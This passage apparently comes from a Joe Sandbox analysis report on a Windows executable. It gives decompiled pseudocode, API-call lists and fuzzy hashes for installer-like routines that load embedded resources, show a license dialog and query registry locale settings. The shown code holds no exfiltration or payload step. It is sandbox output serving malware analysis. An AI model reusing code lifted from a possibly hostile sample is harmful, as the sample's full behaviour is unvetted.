                                                                                                                                                                                                                                            • ReleaseDC.USER32(?,00000000), ref: 00A04447
                                                                                                                                                                                                                                            • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,?), ref: 00A044A2
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Window$CapsDeviceRect$Release
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2212493051-0
                                                                                                                                                                                                                                            • Opcode ID: 3110ab412b17da08783f428acd621803750051f139d0944a475c24b96ab5a129
                                                                                                                                                                                                                                            • Instruction ID: fcd66c817c3c5757e06f11c6d5800d7ea7a09cc8b46ffc436338dec36f3cd324
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3110ab412b17da08783f428acd621803750051f139d0944a475c24b96ab5a129
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 65311071E0021DAFCB14CFF8DD899EEBBB5FB89310F154169E905B3250D6716D068B50
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 53%
                                                                                                                                                                                                                                            			E00A06298(intOrPtr __ecx, intOrPtr* __edx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v28;
                                                                                                                                                                                                                                            				intOrPtr _v32;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _v36;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t16;
                                                                                                                                                                                                                                            				struct HRSRC__* _t21;
                                                                                                                                                                                                                                            				intOrPtr _t26;
                                                                                                                                                                                                                                            				void* _t30;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t36;
                                                                                                                                                                                                                                            				intOrPtr* _t40;
                                                                                                                                                                                                                                            				void* _t41;
                                                                                                                                                                                                                                            				intOrPtr* _t44;
                                                                                                                                                                                                                                            				intOrPtr* _t45;
                                                                                                                                                                                                                                            				void* _t47;
                                                                                                                                                                                                                                            				signed int _t50;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t51;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t44 = __edx;
                                                                                                                                                                                                                                            				_t16 =  *0xa08004; // 0xe10713fe
                                                                                                                                                                                                                                            				_v8 = _t16 ^ _t50;
                                                                                                                                                                                                                                            				_t46 = 0;
                                                                                                                                                                                                                                            				_v32 = __ecx;
                                                                                                                                                                                                                                            				_v36 = 0;
                                                                                                                                                                                                                                            				_t36 = 1;
                                                                                                                                                                                                                                            				E00A0171E( &_v28, 0x14, "UPDFILE%lu", 0);
                                                                                                                                                                                                                                            				while(1) {
                                                                                                                                                                                                                                            					_t51 = _t51 + 0x10;
                                                                                                                                                                                                                                            					_t21 = FindResourceA(_t46,  &_v28, 0xa);
                                                                                                                                                                                                                                            					if(_t21 == 0) {
                                                                                                                                                                                                                                            						break;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t45 = LockResource(LoadResource(_t46, _t21));
                                                                                                                                                                                                                                            					if(_t45 == 0) {
                                                                                                                                                                                                                                            						 *0xa09124 = 0x80070714;
                                                                                                                                                                                                                                            						_t36 = _t46;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_t5 = _t45 + 8; // 0x8
                                                                                                                                                                                                                                            						_t44 = _t5;
                                                                                                                                                                                                                                            						_t40 = _t44;
                                                                                                                                                                                                                                            						_t6 = _t40 + 1; // 0x9
                                                                                                                                                                                                                                            						_t47 = _t6;
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_t26 =  *_t40;
                                                                                                                                                                                                                                            							_t40 = _t40 + 1;
                                                                                                                                                                                                                                            						} while (_t26 != 0);
                                                                                                                                                                                                                                            						_t41 = _t40 - _t47;
                                                                                                                                                                                                                                            						_t46 = _t51;
                                                                                                                                                                                                                                            						_t7 = _t41 + 1; // 0xa
                                                                                                                                                                                                                                            						 *0xa0a288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
                                                                                                                                                                                                                                            						_t30 = _v32();
                                                                                                                                                                                                                                            						if(_t51 != _t51) {
                                                                                                                                                                                                                                            							asm("int 0x29");
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_push(_t45);
                                                                                                                                                                                                                                            						if(_t30 == 0) {
                                                                                                                                                                                                                                            							_t36 = 0;
                                                                                                                                                                                                                                            							FreeResource(??);
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							FreeResource();
                                                                                                                                                                                                                                            							_v36 = _v36 + 1;
                                                                                                                                                                                                                                            							E00A0171E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
                                                                                                                                                                                                                                            							_t46 = 0;
                                                                                                                                                                                                                                            							continue;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					L12:
                                                                                                                                                                                                                                            					return E00A06CE0(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				goto L12;
                                                                                                                                                                                                                                            			}






















                                                                                                                                                                                                                                            0x00a06298
                                                                                                                                                                                                                                            0x00a062a0
                                                                                                                                                                                                                                            0x00a062a7
                                                                                                                                                                                                                                            0x00a062ad
                                                                                                                                                                                                                                            0x00a062af
                                                                                                                                                                                                                                            0x00a062bb
                                                                                                                                                                                                                                            0x00a062c3
                                                                                                                                                                                                                                            0x00a062c4
                                                                                                                                                                                                                                            0x00a0633b
                                                                                                                                                                                                                                            0x00a0633b
                                                                                                                                                                                                                                            0x00a06345
                                                                                                                                                                                                                                            0x00a0634d
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a062da
                                                                                                                                                                                                                                            0x00a062de
                                                                                                                                                                                                                                            0x00a0635f
                                                                                                                                                                                                                                            0x00a06369
                                                                                                                                                                                                                                            0x00a062e0
                                                                                                                                                                                                                                            0x00a062e0
                                                                                                                                                                                                                                            0x00a062e0
                                                                                                                                                                                                                                            0x00a062e3
                                                                                                                                                                                                                                            0x00a062e5
                                                                                                                                                                                                                                            0x00a062e5
                                                                                                                                                                                                                                            0x00a062e8
                                                                                                                                                                                                                                            0x00a062e8
                                                                                                                                                                                                                                            0x00a062ea
                                                                                                                                                                                                                                            0x00a062eb
                                                                                                                                                                                                                                            0x00a062ef
                                                                                                                                                                                                                                            0x00a062f1
                                                                                                                                                                                                                                            0x00a062f3
                                                                                                                                                                                                                                            0x00a06302
                                                                                                                                                                                                                                            0x00a06308
                                                                                                                                                                                                                                            0x00a0630d
                                                                                                                                                                                                                                            0x00a06314
                                                                                                                                                                                                                                            0x00a06314
                                                                                                                                                                                                                                            0x00a06316
                                                                                                                                                                                                                                            0x00a06319
                                                                                                                                                                                                                                            0x00a06355
                                                                                                                                                                                                                                            0x00a06357
                                                                                                                                                                                                                                            0x00a0631b
                                                                                                                                                                                                                                            0x00a0631b
                                                                                                                                                                                                                                            0x00a06331
                                                                                                                                                                                                                                            0x00a06334
                                                                                                                                                                                                                                            0x00a06339
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a06339
                                                                                                                                                                                                                                            0x00a06319
                                                                                                                                                                                                                                            0x00a0636b
                                                                                                                                                                                                                                            0x00a0637d
                                                                                                                                                                                                                                            0x00a0637d
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00A0171E: _vsnprintf.MSVCRT ref: 00A01750
                                                                                                                                                                                                                                            • LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,00A051CA,00000004,00000024,00A02F71,?,00000002,00000000), ref: 00A062CD
                                                                                                                                                                                                                                            • LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,00A051CA,00000004,00000024,00A02F71,?,00000002,00000000), ref: 00A062D4
                                                                                                                                                                                                                                            • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,00A051CA,00000004,00000024,00A02F71,?,00000002,00000000), ref: 00A0631B
                                                                                                                                                                                                                                            • FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 00A06345
                                                                                                                                                                                                                                            • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,00A051CA,00000004,00000024,00A02F71,?,00000002,00000000), ref: 00A06357
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Resource$Free$FindLoadLock_vsnprintf
                                                                                                                                                                                                                                            • String ID: UPDFILE%lu
                                                                                                                                                                                                                                            • API String ID: 2922116661-2329316264
                                                                                                                                                                                                                                            • Opcode ID: 6636903362ac23a8161b55e853a9a2674574e7e917699ef7a5e9772880c97852
                                                                                                                                                                                                                                            • Instruction ID: fa0a2b252caad41910be2daa06d0bee3ad7e666d569959a4253dc60512a1c550
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6636903362ac23a8161b55e853a9a2674574e7e917699ef7a5e9772880c97852
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3121D675A0021DABDB10DFA4AC459FFBB78FB48714B004219F902A7281DB759D178BE1
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                                                                                            			E00A0681F(void* __ebx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v20;
                                                                                                                                                                                                                                            				struct _OSVERSIONINFOA _v168;
                                                                                                                                                                                                                                            				void* _v172;
                                                                                                                                                                                                                                            				int* _v176;
                                                                                                                                                                                                                                            				int _v180;
                                                                                                                                                                                                                                            				int _v184;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t19;
                                                                                                                                                                                                                                            				long _t31;
                                                                                                                                                                                                                                            				signed int _t35;
                                                                                                                                                                                                                                            				void* _t36;
                                                                                                                                                                                                                                            				intOrPtr _t41;
                                                                                                                                                                                                                                            				signed int _t44;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t36 = __ebx;
                                                                                                                                                                                                                                            				_t19 =  *0xa08004; // 0xe10713fe
                                                                                                                                                                                                                                            				_v8 = _t19 ^ _t44;
                                                                                                                                                                                                                                            				_t41 =  *0xa081d8; // 0x0
                                                                                                                                                                                                                                            				_t43 = 0;
                                                                                                                                                                                                                                            				_v180 = 0xc;
                                                                                                                                                                                                                                            				_v176 = 0;
                                                                                                                                                                                                                                            				if(_t41 == 0xfffffffe) {
                                                                                                                                                                                                                                            					 *0xa081d8 = 0;
                                                                                                                                                                                                                                            					_v168.dwOSVersionInfoSize = 0x94;
                                                                                                                                                                                                                                            					if(GetVersionExA( &_v168) == 0) {
                                                                                                                                                                                                                                            						L12:
                                                                                                                                                                                                                                            						_t41 =  *0xa081d8; // 0x0
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_t41 = 1;
                                                                                                                                                                                                                                            						if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v172) != 0) {
                                                                                                                                                                                                                                            							goto L12;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t31 = RegQueryValueExA(_v172, 0xa01140, 0,  &_v184,  &_v20,  &_v180);
                                                                                                                                                                                                                                            							_t43 = _t31;
                                                                                                                                                                                                                                            							RegCloseKey(_v172);
                                                                                                                                                                                                                                            							if(_t31 != 0) {
                                                                                                                                                                                                                                            								goto L12;
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_t40 =  &_v176;
                                                                                                                                                                                                                                            								if(E00A066F9( &_v20,  &_v176) == 0) {
                                                                                                                                                                                                                                            									goto L12;
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									_t35 = _v176 & 0x000003ff;
                                                                                                                                                                                                                                            									if(_t35 == 1 || _t35 == 0xd) {
                                                                                                                                                                                                                                            										 *0xa081d8 = _t41;
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										goto L12;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E00A06CE0(_t41, _t36, _v8 ^ _t44, _t40, _t41, _t43);
                                                                                                                                                                                                                                            			}


















                                                                                                                                                                                                                                            0x00a0681f
                                                                                                                                                                                                                                            0x00a0682a
                                                                                                                                                                                                                                            0x00a06831
                                                                                                                                                                                                                                            0x00a06836
                                                                                                                                                                                                                                            0x00a0683c
                                                                                                                                                                                                                                            0x00a0683e
                                                                                                                                                                                                                                            0x00a06848
                                                                                                                                                                                                                                            0x00a06851
                                                                                                                                                                                                                                            0x00a0685d
                                                                                                                                                                                                                                            0x00a06864
                                                                                                                                                                                                                                            0x00a06876
                                                                                                                                                                                                                                            0x00a0693a
                                                                                                                                                                                                                                            0x00a0693a
                                                                                                                                                                                                                                            0x00a0687c
                                                                                                                                                                                                                                            0x00a0687e
                                                                                                                                                                                                                                            0x00a06885
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a068d6
                                                                                                                                                                                                                                            0x00a068f4
                                                                                                                                                                                                                                            0x00a06900
                                                                                                                                                                                                                                            0x00a06902
                                                                                                                                                                                                                                            0x00a0690a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a0690c
                                                                                                                                                                                                                                            0x00a0690c
                                                                                                                                                                                                                                            0x00a0691c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a0691e
                                                                                                                                                                                                                                            0x00a06924
                                                                                                                                                                                                                                            0x00a0692b
                                                                                                                                                                                                                                            0x00a06932
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a0692b
                                                                                                                                                                                                                                            0x00a0691c
                                                                                                                                                                                                                                            0x00a0690a
                                                                                                                                                                                                                                            0x00a06885
                                                                                                                                                                                                                                            0x00a06876
                                                                                                                                                                                                                                            0x00a06951

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetVersionExA.KERNEL32(?,00000000,00000002), ref: 00A0686E
                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(0000004A), ref: 00A068A7
                                                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 00A068CC
                                                                                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(?,00A01140,00000000,?,?,0000000C), ref: 00A068F4
                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00A06902
                                                                                                                                                                                                                                              • Part of subcall function 00A066F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,00A0691A), ref: 00A06741
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            • Control Panel\Desktop\ResourceLocale, xrefs: 00A068C2
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
                                                                                                                                                                                                                                            • String ID: Control Panel\Desktop\ResourceLocale
                                                                                                                                                                                                                                            • API String ID: 3346862599-1109908249
                                                                                                                                                                                                                                            • Opcode ID: 18a85d9700ef4110b3d5b312069fa6b8a3142055c0db4cf2c0a7362d67be1f7d
                                                                                                                                                                                                                                            • Instruction ID: 07e8aaf4ec8fef67002b08475691e3ce02d045c238a4400ae43cedc03aa0993d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 18a85d9700ef4110b3d5b312069fa6b8a3142055c0db4cf2c0a7362d67be1f7d
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 93316431A0032C9FDB21CF51EC45BAA7778FF55758F0001A5E989A6280DB709E97CF52
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00A03A3F(void* __eflags) {
                                                                                                                                                                                                                                            				void* _t3;
                                                                                                                                                                                                                                            				void* _t9;
                                                                                                                                                                                                                                            				CHAR* _t16;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t16 = "LICENSE";
                                                                                                                                                                                                                                            				_t1 = E00A0468F(_t16, 0, 0) + 1; // 0x1
                                                                                                                                                                                                                                            				_t3 = LocalAlloc(0x40, _t1);
                                                                                                                                                                                                                                            				 *0xa08d4c = _t3;
                                                                                                                                                                                                                                            				if(_t3 != 0) {
                                                                                                                                                                                                                                            					_t19 = _t16;
                                                                                                                                                                                                                                            					if(E00A0468F(_t16, _t3, _t28) != 0) {
                                                                                                                                                                                                                                            						if(lstrcmpA( *0xa08d4c, "<None>") == 0) {
                                                                                                                                                                                                                                            							LocalFree( *0xa08d4c);
                                                                                                                                                                                                                                            							L9:
                                                                                                                                                                                                                                            							 *0xa09124 = 0;
                                                                                                                                                                                                                                            							return 1;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t9 = E00A06517(_t19, 0x7d1, 0, E00A03100, 0, 0);
                                                                                                                                                                                                                                            						LocalFree( *0xa08d4c);
                                                                                                                                                                                                                                            						if(_t9 != 0) {
                                                                                                                                                                                                                                            							goto L9;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						 *0xa09124 = 0x800704c7;
                                                                                                                                                                                                                                            						L2:
                                                                                                                                                                                                                                            						return 0;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					E00A044B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            					LocalFree( *0xa08d4c);
                                                                                                                                                                                                                                            					 *0xa09124 = 0x80070714;
                                                                                                                                                                                                                                            					goto L2;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				E00A044B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            				 *0xa09124 = E00A06285();
                                                                                                                                                                                                                                            				goto L2;
                                                                                                                                                                                                                                            			}






                                                                                                                                                                                                                                            0x00a03a46
                                                                                                                                                                                                                                            0x00a03a57
                                                                                                                                                                                                                                            0x00a03a5d
                                                                                                                                                                                                                                            0x00a03a63
                                                                                                                                                                                                                                            0x00a03a6a
                                                                                                                                                                                                                                            0x00a03a91
                                                                                                                                                                                                                                            0x00a03a9a
                                                                                                                                                                                                                                            0x00a03ad8
                                                                                                                                                                                                                                            0x00a03b13
                                                                                                                                                                                                                                            0x00a03b19
                                                                                                                                                                                                                                            0x00a03b1b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a03b21
                                                                                                                                                                                                                                            0x00a03ae7
                                                                                                                                                                                                                                            0x00a03af4
                                                                                                                                                                                                                                            0x00a03afc
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a03afe
                                                                                                                                                                                                                                            0x00a03a87
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a03a87
                                                                                                                                                                                                                                            0x00a03aa8
                                                                                                                                                                                                                                            0x00a03ab3
                                                                                                                                                                                                                                            0x00a03ab9
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a03ab9
                                                                                                                                                                                                                                            0x00a03a78
                                                                                                                                                                                                                                            0x00a03a82
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00A0468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A046A0
                                                                                                                                                                                                                                              • Part of subcall function 00A0468F: SizeofResource.KERNEL32(00000000,00000000,?,00A02D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A046A9
                                                                                                                                                                                                                                              • Part of subcall function 00A0468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A046C3
                                                                                                                                                                                                                                              • Part of subcall function 00A0468F: LoadResource.KERNEL32(00000000,00000000,?,00A02D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A046CC
                                                                                                                                                                                                                                              • Part of subcall function 00A0468F: LockResource.KERNEL32(00000000,?,00A02D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A046D3
                                                                                                                                                                                                                                              • Part of subcall function 00A0468F: memcpy_s.MSVCRT ref: 00A046E5
                                                                                                                                                                                                                                              • Part of subcall function 00A0468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A046EF
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00A02F64,?,00000002,00000000), ref: 00A03A5D
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 00A03AB3
                                                                                                                                                                                                                                              • Part of subcall function 00A044B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A04518
                                                                                                                                                                                                                                              • Part of subcall function 00A044B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00A04554
                                                                                                                                                                                                                                              • Part of subcall function 00A06285: GetLastError.KERNEL32(00A05BBC), ref: 00A06285
                                                                                                                                                                                                                                            • lstrcmpA.KERNEL32(<None>,00000000), ref: 00A03AD0
                                                                                                                                                                                                                                            • LocalFree.KERNEL32 ref: 00A03B13
                                                                                                                                                                                                                                              • Part of subcall function 00A06517: FindResourceA.KERNEL32(00A00000,000007D6,00000005), ref: 00A0652A
                                                                                                                                                                                                                                              • Part of subcall function 00A06517: LoadResource.KERNEL32(00A00000,00000000,?,?,00A02EE8,00000000,00A019E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00A06538
                                                                                                                                                                                                                                              • Part of subcall function 00A06517: DialogBoxIndirectParamA.USER32(00A00000,00000000,00000547,00A019E0,00000000), ref: 00A06557
                                                                                                                                                                                                                                              • Part of subcall function 00A06517: FreeResource.KERNEL32(00000000,?,?,00A02EE8,00000000,00A019E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00A06560
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,00A03100,00000000,00000000), ref: 00A03AF4
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                                                                                                                                                                                                                                            • String ID: <None>$LICENSE
                                                                                                                                                                                                                                            • API String ID: 2414642746-383193767
                                                                                                                                                                                                                                            • Opcode ID: 59a6f6d062fdb84cd4f54c2ea60fa54d37af1fb1e5fd38398ff174307e4f29fb
                                                                                                                                                                                                                                            • Instruction ID: 86138068a2e46c4371d3164328364c17c36b3b43a47b7e75d478416ab8274156
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 59a6f6d062fdb84cd4f54c2ea60fa54d37af1fb1e5fd38398ff174307e4f29fb
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 79119A7170120DABDB20DFB2BD09E1739BDEBD9B40B10462EB645D51F1DBBE88138664
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                                                                                            			E00A024E0(void* __ebx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t7;
                                                                                                                                                                                                                                            				void* _t20;
                                                                                                                                                                                                                                            				long _t26;
                                                                                                                                                                                                                                            				signed int _t27;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t20 = __ebx;
                                                                                                                                                                                                                                            				_t7 =  *0xa08004; // 0xe10713fe
                                                                                                                                                                                                                                            				_v8 = _t7 ^ _t27;
                                                                                                                                                                                                                                            				_t25 = 0x104;
                                                                                                                                                                                                                                            				_t26 = 0;
                                                                                                                                                                                                                                            				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                                                            					E00A0658A( &_v268, 0x104, "wininit.ini");
                                                                                                                                                                                                                                            					WritePrivateProfileStringA(0, 0, 0,  &_v268);
                                                                                                                                                                                                                                            					_t25 = _lopen( &_v268, 0x40);
                                                                                                                                                                                                                                            					if(_t25 != 0xffffffff) {
                                                                                                                                                                                                                                            						_t26 = _llseek(_t25, 0, 2);
                                                                                                                                                                                                                                            						_lclose(_t25);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E00A06CE0(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
                                                                                                                                                                                                                                            			}











                                                                                                                                                                                                                                            0x00a024e0
                                                                                                                                                                                                                                            0x00a024eb
                                                                                                                                                                                                                                            0x00a024f2
                                                                                                                                                                                                                                            0x00a024f7
                                                                                                                                                                                                                                            0x00a02504
                                                                                                                                                                                                                                            0x00a0250e
                                                                                                                                                                                                                                            0x00a0251d
                                                                                                                                                                                                                                            0x00a0252c
                                                                                                                                                                                                                                            0x00a02541
                                                                                                                                                                                                                                            0x00a02546
                                                                                                                                                                                                                                            0x00a02553
                                                                                                                                                                                                                                            0x00a02555
                                                                                                                                                                                                                                            0x00a02555
                                                                                                                                                                                                                                            0x00a02546
                                                                                                                                                                                                                                            0x00a0256c

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 00A02506
